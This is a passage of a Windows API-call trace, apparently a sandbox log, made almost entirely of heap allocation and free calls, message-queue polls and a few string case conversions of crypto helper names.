[0188.065] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0188.065] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0188.065] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd768 [0188.065] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deda8 [0188.065] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0188.065] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0188.065] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0188.065] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0188.065] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa7a0) returned 0xbfef68 [0188.065] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0188.065] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0188.065] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0188.065] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0188.065] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0188.066] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0188.066] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0c8 [0188.066] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0188.066] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0188.066] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0188.066] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df140 [0188.066] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0188.066] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0188.066] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0188.066] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0188.066] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.066] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0188.066] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0188.066] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0188.066] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0188.066] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90b018 [0188.066] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.066] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0188.066] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0188.067] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0188.067] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0188.067] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debc8 [0188.067] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0188.067] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0188.067] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0188.067] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0188.067] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0188.067] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0188.067] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0188.067] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0188.067] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0188.067] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df168 [0188.067] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c26e8 [0188.067] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded30 [0188.067] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0188.067] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28d8 [0188.067] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0188.067] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd348 [0188.067] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df208 [0188.067] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0188.067] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28d8 [0188.067] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0188.067] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded08 [0188.067] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0188.068] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0188.068] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0188.068] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedd0 [0188.068] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0188.068] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0188.068] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0188.068] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0188.068] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0188.068] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0188.068] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec40 [0188.068] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0188.068] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0188.068] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0188.068] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0188.068] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d480 [0188.068] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0188.068] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0188.068] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0188.068] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa548 [0188.068] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0188.068] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0188.068] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0188.068] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0188.068] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0188.068] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0188.069] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0188.069] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0188.069] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0188.069] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0188.069] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0188.069] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0188.069] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0188.069] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0188.069] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0188.069] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0188.069] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0188.069] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0188.069] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0188.069] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0188.069] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0188.069] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0188.069] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec40 | out: hHeap=0x8a0000) returned 1 [0188.069] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0188.069] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0188.069] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec40 [0188.069] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0188.069] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0188.069] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0188.070] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0188.070] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0188.070] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0188.070] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0188.070] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0188.070] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0188.070] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0188.070] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0188.070] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0188.070] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0188.070] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0188.070] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0188.070] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0188.070] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0188.070] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0188.070] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0188.070] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0188.070] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0188.070] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0188.070] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0188.070] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0188.070] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec40 | out: hHeap=0x8a0000) returned 1 [0188.070] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0188.070] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec40 [0188.071] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0188.071] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0188.071] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0188.071] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0188.071] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0188.071] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0188.071] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0188.071] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0188.071] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0188.071] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0188.071] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0188.071] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0188.071] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0188.071] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0188.071] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba0d8 [0188.071] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db408 [0188.071] PeekMessageW (in: lpMsg=0x87e2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e2d4) returned 0 [0188.071] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0188.071] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0188.071] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0188.071] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0188.071] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0188.071] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0188.072] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0188.072] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0188.072] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0188.072] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0188.072] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0188.072] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0188.072] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0188.072] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0188.072] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0188.072] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0188.072] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0188.072] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0188.072] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0188.072] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0188.072] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0188.072] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0188.072] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba228 [0188.072] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0188.072] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0188.072] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0188.072] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0188.072] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0188.072] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0188.072] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0188.073] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0188.073] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0188.073] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0188.073] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db408 [0188.073] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0188.073] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0188.073] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0188.073] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0188.073] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0188.073] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0188.073] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0188.073] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0188.073] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0188.073] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0188.073] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0188.073] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0188.073] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0188.073] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0188.073] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0188.073] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0188.073] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0188.073] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0188.073] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0188.074] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0188.074] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0188.074] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0188.074] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0188.074] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0188.074] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0188.074] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0188.074] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0188.074] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0188.074] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0188.074] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0188.074] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0188.074] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0188.074] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0188.074] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0188.074] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0188.074] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0188.074] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0188.074] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0188.074] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0188.074] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0188.074] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0188.074] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0188.074] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0188.075] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0188.075] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0188.075] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0188.075] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0188.075] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0188.075] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0188.075] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0188.075] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0188.075] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0188.075] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0188.075] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0188.075] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0188.075] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0188.075] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0188.075] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0188.075] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0188.075] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0188.075] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0188.075] HeapFree (in: hHeap=0x8a0000, 